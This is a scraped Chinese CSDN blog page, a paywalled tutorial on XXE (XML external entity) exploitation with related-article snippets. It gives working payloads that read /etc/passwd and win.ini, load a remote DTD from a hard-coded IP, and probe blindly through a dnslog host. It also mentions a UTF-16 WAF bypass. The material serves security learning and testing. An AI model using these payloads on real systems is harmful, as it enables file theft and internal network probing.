XXE的利用手法及绕过

最新推荐文章于 2024-07-19 00:12:38 发布
最新推荐文章于 2024-07-19 00:12:38 发布
阅读量141 收藏
点赞数
分类专栏: 命令执行 文章标签: 数据库 命令执行 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36334672/article/details/135917897
版权

https://mp.weixin.qq.com/s/Kr2o-sSnAkSoyKRpjjK2yg
https://www.anquanke.com/post/id/209826

简单介绍

当目标运行我们引用外部实体时,可通过构造恶意数据,执行任意文件读取,内网端口探测,攻击内网,甚至命令执行——安装了expect扩展。

XXE主要由DTD文档构成,因此先介绍DTD,如下所示红色部分为DTD
image.png
1、开头必须声明为XML <?xml version="1.0"?>
2、第二行为

例如 <!DOCTYPE NOTE    //声明此文档为NOTE类型
     <!DOCTYPE ANY     //也可以为ANY   
     <!DOCTYPE ROOT		//ROOT之类

3、DTD有内外引用两种方式
1)内部的 DOCTYPE 声明

2)外部文档声明
PUBLIC也是可以的,和SYSTEM一样
DTD的实体声明有三种方式
(1)内部实体声明
<!ENTITY 实体名称 "实体的值">
例如:<!ELEMENT note (message+)>
(2)外部实体声明
<!ENTITY 实体名称 SYSTEM "URI">
例如: <!ENTITY foo SYSTEM "file:///etc/passwd">
(3)参数实体声明
<!ENTITY %实体名称 ”实体的值”>或者<!ENTITY %实体名称 SYSTEM ”URI”>
例如:<!ENTITY %remote SYSTEM "[http://119.23.14.70:8080/xxe.xml">](http://119.23.14.70:8080/xxe.xml">)

基础的XXEpyaload

burp搜索XML看是否存在相关XML字段
或自己修改content-type为 application/xml   Content-type: text/xml

1、盲探测

向某个网站的某个端口发送一条请求,成功建立的请求持续时间会特别长

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE ANY[
    <!ENTITY Quan SYSTEM "http://6w3pkd.dnslog.cn">
]>
<root>&Quan;</root>
image.png image.png

2、有回显的读取文件
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root[
    <!ENTITY file PUBLIC "data" "file:///c:/windows/win.ini">
    ]>
<user><username>&file;
最低0.47元/天 解锁文章
qq_36334672
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xxe编码绕过(8-19)
Realiy的博客
08-19 1676
[CSAWQual 2019]Web_Unagi 只能上传xml文件,考虑存在xxe 直接上传显示waf拦截了,转换成utf16编码就能绕过 <!--filename:1.xml--> <!--author:ta3shi--> <!DOCTYPE users[ <!ENTITY a SYSTEM "file:///flag"> ]> <users> <user> <username>Alice</u
第39天:WEB漏洞-XXE&XML之利用检测绕过全解1
08-03
**XXE漏洞的利用示例**: 1. **读取文件**:通过定义外部实体并引用它来读取文件,如`<!ENTITY xxe SYSTEM "file:///d://test.txt">`,然后在XML中使用`&xxe;`。 2. **内网探测**:利用外部实体请求内网服务,如`<!...
WEB漏洞-XXE&XML之利用检测绕过全解
xhscxj的博客
02-07 1581
xml基础概念 XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。 ...
39 WEB漏洞-XXE&XML之利用检测绕过全解
山兔的博客
10-20 507
主要是通过爬行的数据包,用BP抓包,并且在bp上面有爬行数据包的功能,我们可以让bp帮我们爬取整个网站,把地址请求都爬一遍,爬完之后,可以在每个数据包里面进行批量搜索,搜索Content-Type值的判断,如果在这个数值里面,发现有text/xml或者application/xml,表示后面接上的数据,都是xml的格式语言的数据传递,这个时候是符合xml语言的接收,这个时候就能够进行尝试漏洞。从发现目标地址到目标的资产收集,对目标的资产信息进行攻击,找到对应的漏洞来实现一步步的操作。DOCTYPE和<!
WEB漏洞-XXE&XML之利用检测绕过
m0_65137829的博客
07-24 1417
XXE-"xml external entity injection" 服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入
XXE的理解与绕过
weixin_50464560的博客
11-30 1549
转载至https://www.freebuf.com/articles/web/291094.html 前置知识XXE如何理解?它是可扩展标记语言 ( XML) 用于存储和传输数据。通常始于异步JavaScript和XML技术(ajax技术):网页应用能够快速地将增量更新呈现在用户界面上,而不需要重载(刷新)整个页面。目前JSON的使用比XML更加普遍。JSON和XML都被用于在Ajax模型中的XML技术。这种标记语言允许开发人员定义和表示任意数据结构的HTML。以下为定义属性和值的Security Ass
【WEB漏洞原理】XML&XXE利用检测绕过
过期的秋刀鱼
09-14 839
XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害XXE是XML的一个漏洞XXE产生根本原因:网站接受XML数据,没有对xml进行过滤。
WEB漏洞-XXE&XML之利用检测绕过全解(39)
san3144393495的博客
06-29 1525
除了这个形式,还有一个过滤,我们绕过思路就是采用协议玩法,换一种协议去执行想要的结果,或者采用外部引用,把核心代码写到外部东西上面去,DTD上面去实现绕过,还有一种编码把一些关键词进行编码,达到关键字的绕过,根据具体情况选出不同的方案。判定这个漏洞存在之后,我们该如何去利用,分为两种,第一种是输出形式,利用的结果显示,分为两种情况,一种情况是有回显,一种是回显;xml:xml被设计成传输和储存数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容。
XXE漏洞学习及利用
qq_38352420的博客
06-30 416
XXE漏洞基础学习 当WEB服务使用XML或者JSON中的一种进行传输时,服务器可能会接收开发人员并未预料到的数据格式。如果服务器上的XML解析器的配置不完善,在JSON传输的终端可能会遭受XXE攻击,也就是俗称的XML外部实体攻击。 XXE是一种针对XML终端实施的攻击,黑客想要实施这种攻击,需要在XML的payload包含外部实体声明,且服务器本身允许实体扩展。这样的话,黑客或许能读取WEB服务器的文件系统,通过UNC路径访问远程文件系统,或者通过HTTP/HTTPS连接到任意主机。 所以学习XXE漏.
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
xxe:小型Web服务器利用XXE
04-09
小型Web服务器可以利用XXEXXE ( Xml eXternal Entity )-基于在处理xml文档期间包含外​​部实体的一类漏洞。 安装和启动 git clone git@github.com:egorchistov/xxe.git pip install -r requirements.txt ...
第四节 XXE漏洞利用 - 任意文件读取-01
09-15
XXE漏洞利用 - 任意文件读取 XXE(Xml External Entity)漏洞是一种常见的安全漏洞,特别是在Web应用程序中广泛存在。XXE漏洞是由于XML解析器对外部实体的解析不当所致,攻击者可以通过构建恶意XML文件来实现文件...
xxexploiter:帮助利用XXE漏洞的工具
02-06
XX资源管理器 它生成XML有效负载,并自动启动服务器以服务所需的DTD或进行数据渗透。 安装 #install node and npm if you don't have it yet npm install -g xxexploiter 从源代码构建和运行 ...
XXE xml注入漏洞 入门
weixin_51458899的博客
02-17 2107
xxe 入门
web漏洞-xml外部实体注入(XXE)
rumil的博客
10-09 2143
XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题",也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。
XXE 原理漏洞详解
灰太的表格的博客
04-03 661
XXE 原理漏洞详解 1 什么是XXE漏洞 XXE漏洞全程XML External Entity Injection 即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取,命令执行 内网端口扫描 攻击内网网站 发起DOS攻击等危害 可以类比SQL注入解析传入SQL语句,解析XML语句 2 什么是XML 一种类似html的语...
XXE漏洞详解
Jeromeyoung
01-28 6478
文章目录XXE漏洞1、造成XXE的原因2、定义3、利用漏洞条件4、XXE使用5、XXE挖掘及扩展1、抓包看accept头是否接受xml2、抓包修改数据类型,把json改成xml来传输数据5、DTD基础知识构建xxe的payload达成攻击使用DTD实体的攻击方式DTD 实体声明:1. 内部实体声明2. 外部实体声明3. 参数实体声明4. 引用公共实体6、实体类别介绍总结7、XXE攻击类别及实例有回显无回显整个调用过程: XXE漏洞 利用数据格式造成攻击 1、造成XXE的原因 运维人员使用了低版本php,l
XXE(外部实体注入漏洞)
dinghuan2011的专栏
09-11 3891
版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/zhangxing52077/article/details/80932730 1.场景还原    近日,微信发来警告通知,告知平台微信支付可能存在XXE(外部实体注入漏洞),笔者根据微信官方技术文档及时修复了该漏洞,分享出来希望能够对大伙有所帮助 2.原因分析   所谓的外部实体注入漏洞,主...
MySQL(事务、索引)&&MyBatis
最新发布
hycccccch的博客
07-19 554
事务指的是一组操作的集合,是一个不可分割的工作单位。事务会将所有的操作作为一个整体一起向系统提交或撤销操作请求,即这些操作要么同时成功,要么同时失败默认MySQL的事务是自动提交,即当执行一条DML语句时,MySQL会立即隐式的提交事务开启事务后运行事务不会对数据改变,commit后才会改变数据如果有命令发生错误,需要进行rollback进行回滚、
xxe漏洞原理及防御方式
05-25
XXE(XML External Entity)漏洞是一种常见的Web应用程序安全漏洞,攻击者利用这种漏洞可以读取本地文件、发起内部网络攻击等。XXE漏洞的原理是通过在XML文档中插入恶意实体来触发解析器加载恶意实体,从而发起攻击。 以下是XXE漏洞的防御方式: 1.禁止使用外部实体:在解析XML文档时,应该禁止使用外部实体,避免攻击者利用外部实体来读取本地文件等。 2.使用白名单:仅允许特定的实体和DTD(Document Type Definition)文件,不允许使用任意的实体和DTD文件。 3.过滤输入数据:在接收用户输入数据时,应该对输入数据进行过滤和检查,避免恶意实体被插入到XML文档中。 4.升级解析器:使用最新版本的XML解析器可以提高安全性,因为新版本通常会修复已知的漏洞。 5.使用WAF(Web应用程序防火墙):WAF可以检测并防止XXE漏洞攻击,建议在Web应用程序中使用WAF。 总之,XXE漏洞是一种常见的Web应用程序安全漏洞,开发人员应该注意防范和修复这种漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值